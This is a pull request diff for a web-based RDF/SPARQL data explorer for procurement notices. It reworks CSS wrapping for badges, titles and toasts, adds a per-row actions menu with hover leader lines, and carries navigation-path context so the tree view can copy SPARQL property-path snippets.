### PR TITLE
Property path on the SPARQL reference card (rework of #110)

### DIFF
--- a/index.html
+++ b/index.html
@@ -589,8 +589,14 @@
                      SELECT-lane results toolbar styling so the two lanes
                      of the Data tab feel visually consistent. The buttons
                      sit right-aligned on the same row as the title via
-                     ms-auto. -->
-                <div class="d-flex align-items-center gap-2 mt-3 mb-3">
+                     ms-auto.
+
+                     Both levels wrap. A notice title is long enough to leave
+                     no room for the buttons on a narrow window, and neither
+                     button can give any width back — both are text-nowrap.
+                     So the pair drops below the title, and below each other
+                     if even that is too wide, rather than off the edge. -->
+                <div class="d-flex align-items-center flex-wrap gap-2 mt-3 mb-3">
                     <h5 id="data-card-title" class="mb-0"></h5>
                     <button type="button" class="tour-trigger" id="reuse-graph-tour-trigger"
                             data-bs-toggle="tooltip" data-bs-placement="top"
@@ -598,28 +604,32 @@
                             aria-label="Take a quick tour of this tab">
                         <i class="bi bi-play-circle"></i>
                     </button>
-                    <button type="button" id="data-share-btn"
-                            class="btn btn-sm btn-outline-secondary ms-auto text-nowrap"
-                            title="Copy shareable URL" style="display: none;">
-                        <i class="bi bi-share"></i> Share view
-                    </button>
-                    <!-- Stage 10 — Download menu for the loaded RDF graph.
-                         Visible whenever the data card itself is visible
-                         (handled by DataView). Three formats: Turtle (the
-                         best fidelity, served from the rawTurtle already in
-                         memory), N-Triples (re-fetched), RDF/XML (re-fetched). -->
-                    <div class="dropdown" id="data-download-menu" style="display: none;">
-                        <button type="button"
-                                class="btn btn-sm btn-outline-primary dropdown-toggle text-nowrap"
-                                id="data-download-btn"
-                                data-bs-toggle="dropdown" aria-expanded="false">
-                            <i class="bi bi-download"></i> Download as…
+                    <!-- The two travel together, and stay at the right edge
+                         whichever row they end up on. -->
+                    <div class="d-flex flex-wrap justify-content-end gap-2 ms-auto">
+                        <button type="button" id="data-share-btn"
+                                class="btn btn-sm btn-outline-secondary text-nowrap"
+                                title="Copy shareable URL" style="display: none;">
+                            <i class="bi bi-share"></i> Share view
                         </button>
-                        <ul class="dropdown-menu dropdown-menu-end" aria-labelledby="data-download-btn">
-                            <li><a class="dropdown-item" href="#" data-download-format="text/turtle">Turtle</a></li>
-                            <li><a class="dropdown-item" href="#" data-download-format="application/rdf+xml">RDF/XML</a></li>
-                            <li><a class="dropdown-item" href="#" data-download-format="application/n-triples">N-Triples</a></li>
-                        </ul>
+                        <!-- Stage 10 — Download menu for the loaded RDF graph.
+                             Visible whenever the data card itself is visible
+                             (handled by DataView). Three formats: Turtle (the
+                             best fidelity, served from the rawTurtle already in
+                             memory), N-Triples (re-fetched), RDF/XML (re-fetched). -->
+                        <div class="dropdown" id="data-download-menu" style="display: none;">
+                            <button type="button"
+                                    class="btn btn-sm btn-outline-primary dropdown-toggle text-nowrap"
+                                    id="data-download-btn"
+                                    data-bs-toggle="dropdown" aria-expanded="false">
+                                <i class="bi bi-download"></i> Download as…
+                            </button>
+                            <ul class="dropdown-menu dropdown-menu-end" aria-labelledby="data-download-btn">
+                                <li><a class="dropdown-item" href="#" data-download-format="text/turtle">Turtle</a></li>
+                                <li><a class="dropdown-item" href="#" data-download-format="application/rdf+xml">RDF/XML</a></li>
+                                <li><a class="dropdown-item" href="#" data-download-format="application/n-triples">N-Triples</a></li>
+                            </ul>
+                        </div>
                     </div>
                 </div>
 

--- a/src/assets/style.css
+++ b/src/assets/style.css
@@ -1343,9 +1343,12 @@ main {
 }
 /* The reference-card button sits at the right edge of its row, so the buttons
    form one column down the card rather than landing wherever the row's text
-   happens to end. Taken out of the flow rather than pushed there by flex:
-   flex would make each part of the row a separate item and drop the spaces
-   around the "→", which belong to the row's inline text. */
+   happens to end. Taken out of the flow rather than pushed there by flex, so
+   that the column holds even on a row that wraps.
+
+   The row is a flex container, but only of two things: the statement and the
+   leader that runs from it to the menu. The statement's parts stay inline
+   inside it, so the spaces around the "→" are still its own text. */
 .tree-node,
 .tree-card-header {
   position: relative;

--- a/src/assets/style.css
+++ b/src/assets/style.css
@@ -1513,24 +1513,57 @@ main {
 /* Split badge — two-tone pill with border */
 .split-badge {
   display: inline-flex;
-  align-items: center;
+  /* Stretch rather than centre. On a pill whose identifier has wrapped, a
+     centred label is only as tall as its own line, and reads as a grey chip
+     afloat in white; each half centres its own text instead. */
+  align-items: stretch;
   font-size: 13px;
   font-weight: 400;
   vertical-align: middle;
   margin-left: 4px;
-  border-radius: 999px;
+  /* Half the height of a pill on one line: 1.5em of text and padding plus its
+     two borders, halved. A pill that fits on its line looks exactly as it did
+     with 999px, and one that has wrapped is a rounded rectangle rather than
+     the ellipse that 999px turns a tall box into. */
+  border-radius: calc(0.75em + 1px);
   overflow: hidden;
   text-decoration: none !important;
   line-height: 1;
   border: 1px solid var(--ted-text-muted);
+  /* So the halves can take a line each rather than breaking into columns of
+     letters when the pane is narrow — a deeply nested row on a phone. */
+  flex-wrap: wrap;
+  /* An identifier is often longer than a narrow pane is wide, and the pill
+     would otherwise keep going past the edge of the card. */
+  max-width: 100%;
+}
+.split-badge-type,
+.split-badge-id {
+  display: flex;
+  align-items: center;
+  padding: 0.25em 0.6em;
+  /* Neither half has anywhere to break: a class name runs its words together
+     and an identifier is one long token, so nothing the usual rules count as
+     a break opportunity. Without `anywhere` the longer half holds its full
+     length and leaves the other a column a character wide —
+     ProcurementProcedureInformationProvider is the one that shows it. */
+  overflow-wrap: anywhere;
+  /* So a half that has a line to itself takes the whole of it. It does nothing
+     while the two still share one, the pill being only as wide as it needs.
+
+     Nothing here decides when they separate: a flex line breaks on each item's
+     unbroken width, so the two part company as soon as they no longer fit side
+     by side, and `anywhere` applies only afterwards, within a half that is
+     still too long for its own line. A floor of 5em stood here to force that
+     and measured identically without it — while padding every ordinary badge
+     out to 10em. */
+  flex-grow: 1;
 }
 .split-badge-type {
-  padding: 0.25em 0.6em;
   background-color: var(--ted-text-muted);
   color: #fff;
 }
 .split-badge-id {
-  padding: 0.25em 0.6em;
   background-color: #fff;
   color: var(--ted-color-literal);
 }

--- a/src/assets/style.css
+++ b/src/assets/style.css
@@ -1760,39 +1760,3 @@ main {
 .toast-header {
   background: var(--ted-blue-5, #F3F6FC);
 }
-
-
-/* ── Tree: copy property path button ── */
-
-.tree-path-copy {
-  background: none;
-  border: none;
-  color: #999;
-  cursor: pointer;
-  padding: 0 4px;
-  margin-left: 8px;
-  font-size: 0.8rem;
-  vertical-align: middle;
-  opacity: 0;
-  transition: opacity 0.15s ease, color 0.15s ease;
-}
-
-/* Reveal the button when the row or card header is hovered */
-.tree-node:hover > .tree-path-copy,
-.tree-card-header:hover > .tree-path-copy {
-  opacity: 1;
-}
-
-.tree-path-copy:hover {
-  color: var(--ted-primary, #2c862d);
-}
-
-/* Keep it visible while focused (keyboard users) */
-.tree-path-copy:focus,
-.tree-path-copy:focus-visible {
-  opacity: 1;
-  outline: 2px solid var(--ted-primary, #2c862d);
-  outline-offset: 2px;
-  border-radius: 3px;
-}
-}

--- a/src/assets/style.css
+++ b/src/assets/style.css
@@ -1169,17 +1169,6 @@ main {
 
 /* ── Tree info popover ── */
 
-.tree-info-btn {
-  background: none;
-  border: none;
-  color: #d63384;
-  cursor: pointer;
-  padding: 0 4px;
-  font-size: 0.85rem;
-  vertical-align: middle;
-  margin-left: 12px;
-}
-
 .tree-info-popover {
   font-family: inherit;
   font-size: 0.8rem;
@@ -1324,16 +1313,83 @@ main {
   font-family: 'Consolas', 'Monaco', monospace;
   font-size: 0.85rem;
 }
-.tree-node { padding: 1px 0; }
+/* The reference-card button sits at the right edge of its row, so the buttons
+   form one column down the card rather than landing wherever the row's text
+   happens to end. Taken out of the flow rather than pushed there by flex:
+   flex would make each part of the row a separate item and drop the spaces
+   around the "→", which belong to the row's inline text. */
+.tree-node,
+.tree-card-header {
+  position: relative;
+}
+
+.tree-node > .tree-actions,
+.tree-card-header > .tree-actions {
+  position: absolute;
+  right: 2px;
+  /* Centred on the row rather than pinned to its top: rows vary in height,
+     and being out of the flow there is no baseline left to sit on. Stretched
+     between top and bottom and centred by flex, not shifted by a transform —
+     a transform would create a stacking context, trapping the open menu's
+     z-index inside this element so the rows below painted over it. */
+  top: 0;
+  bottom: 0;
+  display: flex;
+  align-items: center;
+  line-height: 1;
+}
+
+/* One of these on every row, so it stays quiet until pointed at. */
+.tree-actions-btn {
+  background: none;
+  border: none;
+  cursor: pointer;
+  padding: 0 4px;
+  font-size: 1rem;
+  line-height: 1;
+  color: var(--ted-text-muted);
+  opacity: 0.45;
+}
+
+/* Green on hover, as the tour trigger does — the primary colour is what this
+   application uses to say "this responds to you". */
+.tree-actions-btn:hover,
+.tree-actions-btn:focus-visible,
+.tree-actions-btn[aria-expanded="true"] {
+  color: var(--ted-primary, #2c862d);
+  opacity: 1;
+}
+
+.tree-actions-menu {
+  font-size: 0.85rem;
+}
+
+/* Menu icons take the same muted grey as the tour trigger. */
+.tree-actions-menu .dropdown-item i {
+  color: #9aa0a6;
+  margin-right: 4px;
+}
+
+/* Except the reference card's, which keeps the red the application uses for
+   code — the same red as the values inside the card it opens. */
+.tree-actions-menu .dropdown-item .bi-code-square {
+  color: #d63384;
+}
+
+.tree-node { padding: 1px 26px 1px 0; }
 .tree-card {
   border: 1px solid #dee2e6;
   border-radius: 5px;
   margin: 4px 0;
-  overflow: hidden;
+  /* Not `overflow: hidden`: it clipped the actions menu at the card's edge.
+     The header rounds its own top corners instead, which is all the clipping
+     was doing. */
 }
 .tree-card-header {
   background: #f8f9fa;
-  padding: 4px 8px;
+  border-radius: 4px 4px 0 0;
+  /* Right padding leaves the column the actions menu sits in. */
+  padding: 4px 26px 4px 8px;
   border-bottom: 1px solid #dee2e6;
   font-weight: 500;
 }
@@ -1759,4 +1815,19 @@ main {
 /* Toast header — eu-blue-5 background */
 .toast-header {
   background: var(--ted-blue-5, #F3F6FC);
+}
+
+/* Bootstrap makes a toast 85% opaque by default. A toast lands over the tree,
+   whose rows then read through it. */
+.toast {
+  --bs-toast-bg: #fff;
+}
+
+/* The value a toast is about, set apart from the sentence introducing it. A
+   URI wraps anywhere, having no spaces to break at. */
+.toast-detail {
+  display: block;
+  margin-top: 0.4rem;
+  color: var(--ted-color-literal);
+  overflow-wrap: anywhere;
 }

--- a/src/assets/style.css
+++ b/src/assets/style.css
@@ -1761,3 +1761,38 @@ main {
   background: var(--ted-blue-5, #F3F6FC);
 }
 
+
+/* ── Tree: copy property path button ── */
+
+.tree-path-copy {
+  background: none;
+  border: none;
+  color: #999;
+  cursor: pointer;
+  padding: 0 4px;
+  margin-left: 8px;
+  font-size: 0.8rem;
+  vertical-align: middle;
+  opacity: 0;
+  transition: opacity 0.15s ease, color 0.15s ease;
+}
+
+/* Reveal the button when the row or card header is hovered */
+.tree-node:hover > .tree-path-copy,
+.tree-card-header:hover > .tree-path-copy {
+  opacity: 1;
+}
+
+.tree-path-copy:hover {
+  color: var(--ted-primary, #2c862d);
+}
+
+/* Keep it visible while focused (keyboard users) */
+.tree-path-copy:focus,
+.tree-path-copy:focus-visible {
+  opacity: 1;
+  outline: 2px solid var(--ted-primary, #2c862d);
+  outline-offset: 2px;
+  border-radius: 3px;
+}
+}

--- a/src/assets/style.css
+++ b/src/assets/style.css
@@ -1339,7 +1339,10 @@ main {
   line-height: 1;
 }
 
-/* One of these on every row, so it stays quiet until pointed at. */
+/* One of these on every row, and out of sight until the row is pointed at. On
+   a notice of a few thousand triples a column of them reads as a second dotted
+   rule down the page, beside the leader and competing with the data. Nothing
+   is lost by hiding it: the leader appears on hover and runs to the button. */
 .tree-actions-btn {
   background: none;
   border: none;
@@ -1348,7 +1351,24 @@ main {
   font-size: 1rem;
   line-height: 1;
   color: var(--ted-text-muted);
-  opacity: 0.45;
+  opacity: 0;
+  transition: opacity .12s ease;
+}
+
+/* The row being pointed at, or holding focus, shows its own.
+
+   The structural half sits in :where() so it adds no specificity. Written
+   plainly this selector would outweigh `.tree-actions-btn:hover` below and
+   hold the button at rest strength while you were pointing straight at it. */
+:where(.tree-node, .tree-card-header):hover :where(.tree-actions) .tree-actions-btn,
+:where(.tree-node, .tree-card-header):focus-within :where(.tree-actions) .tree-actions-btn {
+  opacity: .45;
+}
+
+/* Nothing to hover with, so the reveal never comes: rest at the strength a
+   hovered row would have had. */
+@media (hover: none) {
+  .tree-actions-btn { opacity: .45; }
 }
 
 /* Green on hover, as the tour trigger does — the primary colour is what this
@@ -1377,6 +1397,71 @@ main {
 }
 
 .tree-node { padding: 1px 26px 1px 0; }
+
+/* On a wide pane the run from a short value to its menu is long, and the eye
+   loses the line on the way across. Hovering the menu fills that run with a
+   leader back to the row it belongs to.
+
+   Only rows that have a menu to lead to: _renderCycleMarker builds a
+   .tree-node with none, and a leader there would point at nothing.
+
+   Two items only — the statement and the leader. The statement's own parts
+   are inline within it, so they wrap as one run of text and keep the spaces
+   around the "→" that belong to them. */
+.tree-node:has(> .tree-actions) {
+  display: flex;
+  align-items: center;
+}
+
+/* Basis 0, so the leader asks for no width of its own and takes only what the
+   row had left over. With a basis it would reserve space during layout and
+   change where a long value breaks. */
+.tree-node:has(> .tree-actions)::after {
+  content: "";
+  flex: 1 1 0;
+  min-width: 0;
+  height: .9em;
+  background-image: repeating-linear-gradient(to right,
+    rgba(102, 102, 102, .4) 0 1px, transparent 1px 5px);
+  background-repeat: repeat-x;
+  background-size: 5px 1px;
+  background-position: 0 62%;
+  /* The leader stops ~22px short of the menu glyph: without that gap the
+     kebab reads as its last three dots rather than as a control. The same
+     22px from the text on the left, so it sits between the two rather than
+     leaning towards the words; the right number is smaller only because the
+     button's own padding already accounts for 4px of it.
+
+     Masked rather than held off by margins. A margin is width whether or not
+     the leader is showing, and 40px of it came out of every row that has a
+     menu — narrowing the text and moving where a long value breaks. The mask
+     leaves the ends unpainted instead, and the row keeps its full width. */
+  --leader-gap: linear-gradient(to right,
+    transparent 0 22px, #000 22px,
+    #000 calc(100% - 18px), transparent calc(100% - 18px));
+  -webkit-mask-image: var(--leader-gap);
+  mask-image: var(--leader-gap);
+  opacity: 0;
+  transition: opacity .22s ease 0s;
+}
+
+/* Drawn for the button, not for the row: the row being pointed at already
+   shows its own button, and what is left to answer is which row that button
+   belongs to — a question that only arises once the pointer is on it.
+
+   No delay: a leader triggered by the row needed one so that sweeping down
+   the list never lit one up, but nothing sweeps across a button. Leaving
+   stays slower than arriving, so moving between two neighbouring buttons
+   never leaves the eye without a line. */
+.tree-node:has(> .tree-actions .tree-actions-btn:hover)::after,
+.tree-node:has(> .tree-actions .tree-actions-btn:focus-visible)::after {
+  opacity: 1;
+  transition: opacity .12s ease;
+}
+
+/* Their left margin was standing in for the space the row now gets from gap. */
+.tree-node .split-badge,
+.tree-node .tree-type-badge { margin-left: 0; }
 .tree-card {
   border: 1px solid #dee2e6;
   border-radius: 5px;
@@ -1395,7 +1480,18 @@ main {
 }
 .tree-card-header .predicate { text-decoration: none; color: var(--ted-color-predicate); font-weight: 500; }
 .tree-card-header .predicate:hover { text-decoration: underline; color: var(--ted-color-predicate-hover); }
-.tree-card-body { padding: 4px 8px 4px 16px; }
+/* No right padding: the actions sit at `right: 2px` of their own row, so any
+   padding here would set every row in the card 8px inside its own header's
+   button — and again for each level of nesting. The rail reads as one column
+   down the tree only if the bodies leave the right edge alone. */
+.tree-card-body { padding: 4px 0 4px 16px; }
+
+/* Pulled out by exactly one border, so a nested card's right edge lands in the
+   same pixel column as its parent's rather than beside it. Flush without the
+   negative margin leaves the two borders adjacent, and a card three deep then
+   draws three lines a pixel apart. Sharing the column also keeps every card's
+   actions in one rail down the whole tree. */
+.tree-card-body > .tree-card { margin-right: -1px; }
 
 .tree-toggle {
   cursor: pointer;

--- a/src/assets/style.css
+++ b/src/assets/style.css
@@ -303,6 +303,34 @@ main {
 #explorer-procedure-mini { margin-top: 8px; }
 #explorer-procedure-title > span:first-child,
 #procedure-card-title > span:first-child { color: var(--ted-primary, #2c862d); }
+
+/* A procedure ID is a UUID, and its hyphens are break opportunities, so beside
+   the label it stacked four lines deep and took the card title with it. It
+   takes a line of its own instead, once the two no longer fit on one: this is
+   the only place the ID appears — the timeline itself lists publication
+   numbers — so clipping it to the width the label left over would have hidden
+   the whole of it on a narrow pane, where a title tooltip is no use to anyone
+   without a mouse. `anywhere` for an ID that arrives without hyphens. */
+.procedure-title-ids {
+  overflow-wrap: anywhere;
+}
+
+/* On the Explorer's mini card this is itself an item of the header's flex row,
+   beside the chevron, and would hold the width of its own contents — clipping
+   the ID inside a box that had already overrun the card. */
+.procedure-title {
+  min-width: 0;
+  flex-wrap: wrap;
+}
+
+/* The two share the header's width, so without this they give ground together
+   and the label wraps while there is still an ID to clip. The ID gives up all
+   of it first; max-width lets the label wrap once there is nothing left to
+   take, rather than run past the edge of the card. */
+.procedure-title-label {
+  flex-shrink: 0;
+  max-width: 100%;
+}
 #explorer-procedure-mini .card-header,
 #notice-results .card-header {
     background-color: rgba(0, 0, 0, 0.03);

--- a/src/js/DataView.js
+++ b/src/js/DataView.js
@@ -40,6 +40,7 @@ import {
   turtle,
 } from '../vendor/codemirror-bundle.js';
 import { eclipseHighlightStyle, eclipseTheme } from './utils/cmTheme.js';
+import { navigationPath } from './utils/navigationPath.js';
 import { copyToClipboard } from './utils/clipboardCopy.js';
 import { triggerBlobDownload } from './utils/download.js';
 import { classifyError } from './utils/errorMessages.js';
@@ -449,7 +450,12 @@ export class DataView {
     if (this.viewMode === 'tree') {
       const facet = this.controller.currentFacet;
       const subjectUri = facet?.type === 'named-node' ? facet.term?.value : null;
-      this.treeRenderer.render(results.quads, { subjectUri });
+      const { chain, anchor } = navigationPath(this.controller.breadcrumb, this.controller.breadcrumbIndex);
+      this.treeRenderer.render(results.quads, {
+        subjectUri,
+        pathFromRoot: chain,
+        rootPattern: anchor,
+      });
     } else if (this.viewMode === 'turtle') {
       this._renderTurtle(results.rawTurtle);
     }

--- a/src/js/NoticeView.js
+++ b/src/js/NoticeView.js
@@ -288,22 +288,26 @@ export class NoticeView {
   // lets this work both for the Inspect-tab card-header (where the target
   // element is the card-header itself) and for the Explorer mini card
   // (where the target is a span sharing a d-flex parent with the chevron).
-  // `align-items-baseline` keeps the sans-serif label and the monospace IDs
-  // visually aligned on the text baseline — centering by line-box would
-  // misalign them because the two fonts report different metrics.
+  // Centred rather than aligned on the baseline: on a header narrow enough to
+  // wrap the label there is a block of two lines beside a single one, and a
+  // shared first baseline hangs the ID off the top of it.
   _setProcedureTitle(el, procedures) {
     el.replaceChildren();
-    el.classList.add('d-flex', 'align-items-baseline', 'flex-grow-1');
+    el.classList.add('d-flex', 'align-items-center', 'flex-grow-1', 'procedure-title');
 
     const label = document.createElement('span');
+    // pe-3 enforces a real minimum gap on top of the ms-auto pushing the ID
+    // right, so the two never butt up against each other even when the header
+    // is so narrow that the auto-margin collapses to zero. On the label
+    // rather than the ID because padding is width whichever it sits on, and
+    // the label is the half that is capped to the header — on the ID it was
+    // 16px beyond the cap, and the header overran the card.
+    label.className = 'procedure-title-label pe-3';
     label.textContent = 'Procedure Timeline';
     el.appendChild(label);
 
     const ids = document.createElement('span');
-    // ps-3 enforces a real minimum gap on top of the ms-auto pushing right,
-    // so the procedure ID never butts up against the title even when the
-    // header is so narrow that the auto-margin collapses to zero.
-    ids.className = 'ms-auto ps-3 font-monospace text-muted';
+    ids.className = 'ms-auto font-monospace text-muted procedure-title-ids';
     ids.textContent = procedures.map(p => p.procedureId).join(', ');
     el.appendChild(ids);
   }

--- a/src/js/TermRenderer.js
+++ b/src/js/TermRenderer.js
@@ -34,7 +34,7 @@ function setController(controller) {
 // term's kind (named node → <a>, blank node → plain span, literal → span
 // with datatype / language suffixes).
 function renderTerm(term, options = {}) {
-  const { clickable = true, onClick = null } = options;
+  const { clickable = true, onClick = null, viaPath = [], viaRoot = null, viaRootPattern = null } = options;
 
   if (!term || !term.value) {
     const span = document.createElement('span');
@@ -51,7 +51,7 @@ function renderTerm(term, options = {}) {
   }
 
   if (termType === 'NamedNode') {
-    return _renderNamedNode(term, clickable, onClick);
+    return _renderNamedNode(term, clickable, onClick, { viaPath, viaRoot, viaRootPattern });
   }
 
   return _renderLiteral(term);
@@ -75,7 +75,7 @@ function _isNavigableHref(value) {
     && (value.startsWith('http://') || value.startsWith('https://'));
 }
 
-function _renderNamedNode(term, clickable, onClick) {
+function _renderNamedNode(term, clickable, onClick, via = {}) {
   // ePO resources get the same split pill as subject badges.
   const parts = splitEpoResource(term.value);
   if (parts) {
@@ -97,7 +97,7 @@ function _renderNamedNode(term, clickable, onClick) {
     if (clickable && _isNavigableHref(term.value)) {
       el.href = term.value;
     }
-    _attachNavigationHandler(el, term, clickable, onClick);
+    _attachNavigationHandler(el, term, clickable, onClick, via);
     return el;
   }
 
@@ -115,13 +115,21 @@ function _renderNamedNode(term, clickable, onClick) {
     });
   }
 
-  _attachNavigationHandler(el, term, clickable, onClick);
+  _attachNavigationHandler(el, term, clickable, onClick, via);
   return el;
 }
 
 // Wires up the click behaviour for a NamedNode element. Blank-node-like
 // identifiers (no http scheme) render as non-clickable plain text.
-function _attachNavigationHandler(el, term, clickable, onClick) {
+//
+// `via` describes how this term was reached: the chain of predicate URIs
+// walked (`viaPath`), the root subject that chain starts at (`viaRoot`), and
+// the pattern binding that root (`viaRootPattern`). All three ride along on
+// the facet that ExplorerController pushes onto the breadcrumb, so the
+// breadcrumb records not just *which* resources were visited but *how* —
+// which is what lets DataView.navigationPath() reconstruct the whole route
+// and detect when it does not actually join up.
+function _attachNavigationHandler(el, term, clickable, onClick, via = {}) {
   const isNavigable = _isNavigableHref(term.value);
 
   if (!isNavigable || !clickable) {
@@ -144,6 +152,9 @@ function _attachNavigationHandler(el, term, clickable, onClick) {
       _controller.navigateTo({
         type: 'named-node',
         term: { termType: 'NamedNode', value: term.value },
+        viaPath: via.viaPath || [],
+        viaRoot: via.viaRoot ?? null,
+        viaRootPattern: via.viaRootPattern ?? null,
         timestamp: Date.now(),
       });
     });
@@ -185,7 +196,7 @@ function _renderLiteral(term) {
 // _renderNamedNode helper — and then this function would issue a second
 // one after overwriting the text. One badge, one request.
 function renderSubjectBadge(subjectUri, options = {}) {
-  const { clickable = true, badgeClass, onClick = null } = options;
+  const { clickable = true, badgeClass, onClick = null, viaPath = [], viaRoot = null, viaRootPattern = null } = options;
 
   const term = { termType: 'NamedNode', value: subjectUri };
   const badge = document.createElement(clickable ? 'a' : 'span');
@@ -218,7 +229,7 @@ function renderSubjectBadge(subjectUri, options = {}) {
     if (_isNavigableHref(subjectUri)) {
       badge.href = subjectUri;
     }
-    _attachNavigationHandler(badge, term, /* clickable */ true, onClick);
+    _attachNavigationHandler(badge, term, /* clickable */ true, onClick, { viaPath, viaRoot, viaRootPattern });
   }
 
   return badge;

--- a/src/js/TreeRenderer.js
+++ b/src/js/TreeRenderer.js
@@ -70,8 +70,10 @@ export class TreeRenderer {
 
     // `ancestors` is per-branch, not global: the same subject can appear
     // under multiple parents but a real A → B → A cycle is guarded against.
+    // Each root computes its own type context for the copy-path snippet.
     for (const subj of roots) {
-      const node = this._renderSubjectTree(subj, new Set(), null);
+      const rootContext = this._buildRootContext(subj);
+      const node = this._renderSubjectTree(subj, new Set(), null, [], rootContext);
       this.container.appendChild(node);
     }
   }
@@ -217,7 +219,9 @@ export class TreeRenderer {
 
   // Render one subject as a card. Nested cards are lazily built on first
   // toggle-expand to keep the initial DOM small.
-  _renderSubjectTree(subjectValue, ancestors, incomingPredicate) {
+  // `predicatePath` is the chain of predicate URIs from the root to this
+  // card (empty for the root). It drives the "copy path" affordance.
+  _renderSubjectTree(subjectValue, ancestors, incomingPredicate, predicatePath = [], rootContext = null) {
     const fragment = document.createDocumentFragment();
     const predicates = this.subjectIndex.get(subjectValue);
     if (!predicates) return fragment;
@@ -233,14 +237,14 @@ export class TreeRenderer {
     const card = document.createElement('div');
     card.className = 'tree-card';
     card.dataset.subject = subjectValue;
-    card.appendChild(this._buildCardHeader(subjectValue, predicates, incomingPredicate));
+    card.appendChild(this._buildCardHeader(subjectValue, predicates, incomingPredicate, predicatePath, rootContext));
 
     // Root cards render their body eagerly so the tree is
     // immediately visible. Nested cards defer body creation until
     // first expand (lazy render).
     const startExpanded = !incomingPredicate;
     const toggle = card.querySelector('.tree-toggle');
-    const buildBody = () => this._buildCardBody(predicates, branchAncestors);
+    const buildBody = () => this._buildCardBody(predicates, branchAncestors, predicatePath, rootContext);
     let body = null;
 
     if (startExpanded) {
@@ -304,7 +308,7 @@ export class TreeRenderer {
     return el;
   }
 
-  _buildCardHeader(subjectValue, predicates, incomingPredicate) {
+  _buildCardHeader(subjectValue, predicates, incomingPredicate, predicatePath = [], rootContext = null) {
     const header = document.createElement('div');
     header.className = 'tree-card-header';
 
@@ -329,6 +333,12 @@ export class TreeRenderer {
     // Add info icon for root-level cards (no incoming predicate)
     if (!incomingPredicate) {
       header.appendChild(this._buildInfoButton(subjectValue, predicates));
+    }
+
+    // "Copy path" affordance for nested cards — the property path from the
+    // root to this resource. Hidden until the header is hovered (see CSS).
+    if (predicatePath.length > 0) {
+      header.appendChild(this._buildCopyPathButton(predicatePath, rootContext));
     }
 
     return header;
@@ -457,18 +467,19 @@ export class TreeRenderer {
     return btn;
   }
 
-  _buildCardBody(predicates, branchAncestors) {
+  _buildCardBody(predicates, branchAncestors, predicatePath = [], rootContext = null) {
     const body = document.createElement('div');
     body.className = 'tree-card-body';
 
     for (const [predValue, objects] of predicates) {
       const [nestable, nonNestable] = this._partitionObjects(objects, branchAncestors);
+      const childPath = [...predicatePath, predValue];
 
       for (const obj of nonNestable) {
-        body.appendChild(this._renderPredicateObject(predValue, obj));
+        body.appendChild(this._renderPredicateObject(predValue, obj, childPath, rootContext));
       }
       for (const obj of nestable) {
-        body.appendChild(this._renderSubjectTree(obj.value, branchAncestors, predValue));
+        body.appendChild(this._renderSubjectTree(obj.value, branchAncestors, predValue, childPath, rootContext));
       }
     }
 
@@ -490,7 +501,7 @@ export class TreeRenderer {
     return [nestable, nonNestable];
   }
 
-  _renderPredicateObject(predValue, object) {
+  _renderPredicateObject(predValue, object, predicatePath = [], rootContext = null) {
     const row = document.createElement('div');
     row.className = 'tree-node';
     row.dataset.predicate = predValue;
@@ -503,7 +514,81 @@ export class TreeRenderer {
     row.appendChild(document.createTextNode(' → '));
     row.appendChild(renderTerm(object));
 
+    // "Copy path" affordance — the property path from the root to this
+    // leaf value. Hidden until the row is hovered (see CSS).
+    // Skip rdf:type rows — they are classification metadata, not useful query paths.
+    if (predicatePath.length > 0 && predValue !== RDF_TYPE) {
+      row.appendChild(this._buildCopyPathButton(predicatePath, rootContext));
+    }
+
     return row;
+  }
+
+  // Format a predicate-URI chain as a SPARQL property path string,
+  // e.g. ["...#refersToLot", "...#hasPurpose"] →
+  // "epo:refersToLot / epo:hasPurpose". Each URI is shrunk to its
+  // prefixed form when a known namespace matches, else its local name.
+  _formatPropertyPath(predicatePath) {
+    return predicatePath
+      .map(uri => {
+        const shortened = shrink(uri);
+        // shrink() returns the URI unchanged when no known namespace
+        // matches. In that case wrap it in angle brackets so the path
+        // stays valid SPARQL (a bare local name would not be).
+        return shortened !== uri ? shortened : `<${uri}>`;
+      })
+      .join(' / ');
+  }
+
+  // Build a root context object for a given root subject — its shrunk type
+  // and a variable name derived from the type's local name.
+  _buildRootContext(subjectValue) {
+    const predicates = this.subjectIndex.get(subjectValue);
+    const types = predicates?.get(RDF_TYPE) || [];
+    if (types.length > 0) {
+      // Prefer the type with the shortest local name — this picks the most
+      // general/canonical class (e.g. "Notice" over "Notice29" or "ResultNotice").
+      const typeUri = types
+        .map(t => t.value)
+        .sort((a, b) => a.split(/[#/]/).pop().length - b.split(/[#/]/).pop().length)[0];
+      const typeShrunk = shrink(typeUri);
+      const rootType = typeShrunk !== typeUri ? typeShrunk : `<${typeUri}>`;
+      const localName = typeUri.split(/[#/]/).pop();
+      const rootVarName = localName.charAt(0).toLowerCase() + localName.slice(1);
+      return { rootType, rootVarName };
+    }
+    return { rootType: null, rootVarName: 'subject' };
+  }
+
+  // Build a small button that copies a SPARQL triple pattern snippet from
+  // the root to the current node, e.g.:
+  // "?notice a epo:Notice ; epo:refersToLot / epo:hasPurpose / epo:hasMainClassification ?value ."
+  _buildCopyPathButton(predicatePath, rootContext = null) {
+    const path = this._formatPropertyPath(predicatePath);
+    const varName = rootContext?.rootVarName || 'subject';
+    const rootType = rootContext?.rootType || '';
+
+    let snippet;
+    if (rootType) {
+      snippet = `?${varName} a ${rootType} ; ${path} ?value .`;
+    } else {
+      snippet = `?${varName} ${path} ?value .`;
+    }
+
+    const btn = document.createElement('button');
+    btn.className = 'tree-path-copy';
+    btn.setAttribute('aria-label', 'Copy property path');
+    btn.title = snippet;
+    btn.innerHTML = '<i class="bi bi-clipboard"></i>';
+
+    btn.addEventListener('click', async (e) => {
+      e.stopPropagation();
+      const ok = await copyToClipboard(snippet);
+      btn.innerHTML = ok ? '<i class="bi bi-check"></i>' : '<i class="bi bi-x"></i>';
+      setTimeout(() => { btn.innerHTML = '<i class="bi bi-clipboard"></i>'; }, 1500);
+    });
+
+    return btn;
   }
 }
 

--- a/src/js/TreeRenderer.js
+++ b/src/js/TreeRenderer.js
@@ -1042,14 +1042,23 @@ export class TreeRenderer {
     row.dataset.predicate = predValue;
     row.dataset.objectValue = object.value;
 
+    // The statement is one run of text, held in one element. The row itself
+    // lays out that text against the leader and the menu, and if the three
+    // parts were its items instead they would be sized apart — the predicate
+    // wrapping in a column of its own, the arrow stranded between two of
+    // them. Together they wrap as a sentence does.
+    const text = document.createElement('span');
+    text.className = 'tree-node-text';
+
     // No navigation context, for the same reason as the card header: this
     // links to the predicate's own definition, not to a step on the route.
     const pred = renderTerm({ termType: 'NamedNode', value: predValue });
